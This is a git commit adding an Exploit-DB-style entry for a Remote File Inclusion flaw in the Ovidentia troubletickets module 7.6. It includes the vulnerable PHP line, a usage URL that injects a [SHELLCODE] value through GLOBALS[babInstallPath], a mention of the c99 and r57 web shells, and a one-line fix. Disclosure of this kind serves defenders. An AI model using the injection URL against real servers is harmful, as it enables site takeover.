DB: 2016-04-13
1 new exploits Ovidentia troubleticketsModule 7.6 - Remote File Inclusion
This commit is contained in:
parent
921bb6b2e3
commit
95ea5e17e0
2 changed files with 25 additions and 0 deletions
|
@ -35907,3 +35907,4 @@ id,file,description,date,author,platform,type,port
|
|||
39685,platforms/android/dos/39685.txt,"Android - IOMX getConfig/getParameter Information Disclosure",2016-04-11,"Google Security Research",android,dos,0
|
||||
39686,platforms/android/dos/39686.txt,"Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0
|
||||
39687,platforms/jsp/webapps/39687.txt,"Novell Service Desk 7.1.0_ 7.0.3 and 6.5 - Multiple Vulnerabilities",2016-04-11,"Pedro Ribeiro",jsp,webapps,0
|
||||
39688,platforms/php/webapps/39688.txt,"Ovidentia troubleticketsModule 7.6 - Remote File Inclusion",2016-04-12,bd0rk,php,webapps,80
|
||||
|
|
Can't render this file because it is too large.
|
24
platforms/php/webapps/39688.txt
Executable file
24
platforms/php/webapps/39688.txt
Executable file
|
@ -0,0 +1,24 @@
|
|||
# Title: Ovidentia Module troubletickets 7.6 GLOBALS[babInstallPath] Remote File Inclusion Vulnerability
|
||||
# Author: bd0rk || SCHOOL-OF-HACK.NET
|
||||
# eMail: bd0rk[at]hackermail.com
|
||||
# Website: http://www.school-of-hack.net
|
||||
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Ftroubletickets&file=troubletickets-7-6.zip&idf=838
|
||||
|
||||
Proof-of-Concept:
|
||||
|
||||
Vuln.-Code in /troubletickets-7-6/programs/statistique_evolution.php line 16
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
require_once $GLOBALS['babInstallPath'].'utilit/dateTime.php';
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
[+]Usage: http://[someone]/troubletickets-7-6/programs/statistique_evolution.php?GLOBALS[babInstallPath]=[SHELLCODE]
|
||||
|
||||
The problem: The GLOBALS[babInstallPath]-parameter isn't declared before require_once.
|
||||
So an attacker can inject some php-shellcode (c99 or r57 for example) 'bout it.
|
||||
It's no problem to patch it!
|
||||
Declare this parameter or use an alert!
|
||||
|
||||
|
||||
Greetings from bd0rk. HackThePlanet!
|
Loading…
Add table
Reference in a new issue